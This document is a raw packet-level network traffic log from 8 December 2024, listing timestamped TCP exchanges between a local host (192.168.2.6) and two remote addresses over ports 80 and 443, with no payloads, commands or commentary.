Dec 8, 2024 13:31:53.666935921 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.667642117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.667689085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.667737007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.667809010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.668447971 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.668492079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.668555021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.668632030 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.669347048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.669394016 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.669518948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.669627905 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.670169115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.670258999 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.670300961 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.671026945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.671088934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.671134949 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.671206951 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.671916008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.671958923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.671974897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.672017097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.672741890 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.672777891 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.672801018 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.672836065 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.673616886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.673661947 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.673799038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.673845053 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.674428940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.674551964 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.674597979 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.675287962 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.675333977 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.675390959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.675456047 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.676153898 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.676239967 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.676367044 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.676413059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.677046061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.677150011 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.677159071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.677196980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.677850008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.677897930 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.677968025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.678013086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.678740978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.678869009 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.678895950 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.678906918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.679596901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.679645061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.679666042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.679753065 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.680438042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.680484056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.680623055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.680691004 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.681252003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.681303024 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.681344986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.681385994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.682106018 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.682152033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.682219982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.682265997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.682962894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.683010101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.683077097 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.683123112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.683780909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.683840036 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.683933973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.683981895 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.684942961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.684990883 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.685045004 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.685132027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.686115980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.686181068 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.686300039 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.686347008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.687251091 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.687299967 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.687418938 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.687457085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.688585997 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.688642979 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.688687086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.688755035 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.690177917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.690243959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.690371990 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.690416098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.691613913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.691678047 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.691740036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.691808939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.692245007 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.692292929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.692336082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.692389011 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.692809105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.692873955 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.692886114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.692923069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.693557024 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.693567991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.693617105 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.797859907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.797884941 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.797925949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.797961950 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.798278093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.798325062 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.798388958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.798429012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.799149990 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.799274921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.799323082 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.799995899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.800044060 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.800695896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.800797939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.800893068 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.800903082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.800949097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.801769972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.801779985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.801826000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.802541971 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.802655935 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.802969933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.803016901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.803397894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.803416014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.803451061 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.804266930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.804317951 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.804537058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.804594040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.805095911 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.805155993 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.805162907 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.805224895 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.805968046 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.806013107 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.806310892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.806364059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.806794882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.806840897 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.807398081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.807442904 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.807682037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.807692051 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.807729006 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.808509111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.808552980 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.808572054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.808763027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.809390068 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.809439898 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.809700966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.809756994 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.810235023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.810281038 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.810754061 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.810801029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.811109066 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.811121941 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.811158895 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.811928034 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.811986923 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.812710047 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.812792063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.812802076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.812834978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.813700914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.813776016 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.814107895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.814158916 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.856571913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.856673002 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.856702089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.856755018 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.856976032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.856987953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.857033968 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.857597113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.857654095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.858145952 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.858198881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.858442068 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.858485937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.858563900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.858609915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.858908892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.858978033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.859785080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.859800100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.859823942 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.859829903 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.859848022 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.859873056 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.860606909 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.860651970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.861192942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.861244917 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.861548901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.861598015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.861785889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.861830950 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.862462997 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.862517118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.862620115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.862663984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.863178968 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.863225937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.864036083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.864049911 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.864088058 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.864094019 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.864123106 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.864917994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.864973068 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.865736961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.865746975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.865786076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.865798950 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.865863085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.866647959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.866695881 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.867002010 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.867078066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.867430925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.867477894 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.868381023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.868395090 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.868416071 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.868423939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.868438959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.868458986 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.869137049 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.869182110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.869729042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.869820118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.870111942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.870151043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.870172977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.870227098 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.870883942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.870929956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.871125937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.871172905 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.871712923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.871758938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.872282028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.872342110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.872562885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.872605085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.872742891 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.872806072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.873455048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.873531103 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.874304056 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.874315023 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.874360085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.874372959 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.874427080 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.875077963 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.875123024 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.875804901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.875839949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.875983953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.875993967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.876152039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.876822948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.876935005 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.877722979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.877736092 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.877746105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.877840042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.878528118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.878648043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.879085064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.879256964 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.879390955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.879400969 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.879483938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.880222082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.880362034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.880707026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.880852938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.881140947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.881153107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.881242037 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.881911993 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.882008076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.882610083 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.882814884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.882826090 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.882837057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.882993937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.883660078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.883733034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.884201050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.884320021 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.939939976 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.939973116 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.940043926 CET	49852	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.940071106 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.940264940 CET	49852	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.940279007 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.940304041 CET	49852	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.940422058 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.940453053 CET	443	49852	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.940578938 CET	49852	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.942794085 CET	49857	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.942821026 CET	443	49857	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.942980051 CET	49857	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.943041086 CET	49857	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:53.943044901 CET	443	49857	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:53.990464926 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.990698099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.990780115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.990879059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.990890980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.990901947 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.990938902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.991700888 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.991789103 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.991816044 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.991918087 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:53.992533922 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:53.993359089 CET	80	49835	185.215.113.206	192.168.2.6
